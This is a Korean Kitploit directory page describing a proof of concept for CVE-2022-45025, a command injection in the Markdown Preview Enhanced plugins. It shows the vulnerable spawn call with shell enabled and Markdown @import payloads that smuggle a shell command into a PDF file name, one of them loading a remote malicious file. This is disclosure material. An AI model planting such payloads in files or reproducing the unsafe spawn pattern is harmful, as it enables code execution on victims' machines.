Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/yuriisanin/cve-2022-45025
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubyuriisanin/cve-2022-45025

CVE-2022-45025

[PoC] Markdown Preview Enhanced(VSCode, Atom)의 PDF 가져오기를 통한 명령 주입 취약점

저장소 보기
88173년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-45025

PDF 가져오기를 통한 명령 주입 취약점 (Markdown Preview Enhanced - VSCode, Atom)

설명

Mume 마크다운 도구 라이브러리는 {shell: true} 옵션과 함께 spawn 명령을 사용하여 명령 주입 취약점에 노출되었습니다. 이 취약점으로 인해 공격자는 피해자를 속여 VSCode 또는 Atom을 사용해 특수하게 조작된 Markdown 파일을 열게 함으로써 임의 코드 실행을 달성할 수 있습니다. 이 라이브러리는 VSCode 및 Atom용 Markdown Preview Enhanced 플러그인을 구동합니다.

취약한 코드 조각:

root@kitploit:~
const task = spawn(
      "pdf2svg",
      [
        `"${pdfFilePath}"`,
        `"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
        "all",
      ],
      { shell: true },
    )

개념 증명 (PoC)

다음 Markdown 문서를 사용하면 공격자가 임의 명령을 실행할 수 있습니다:

root@kitploit:~
@import "$(open -a Calculator > /dev/null | exit 0)hello.pdf"

다음 주석은 MPE에서 유효한 "@import" 명령으로 인식됩니다:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

또는 페이로드를 외부 소스에서 실행할 수도 있습니다:

root@kitploit:~
<!-- @import "https://raw.githubusercontent.com/yuriisanin/CVE-2022-45025/main/examples/malicious.md" -->

YouTube에서 VSCode 및 Atom 데모를 확인하세요.

vscode-rce-poc-gif

지원

Twitter, GitHub 또는 YouTube에서 저를 팔로우할 수 있습니다.

도구 다운로드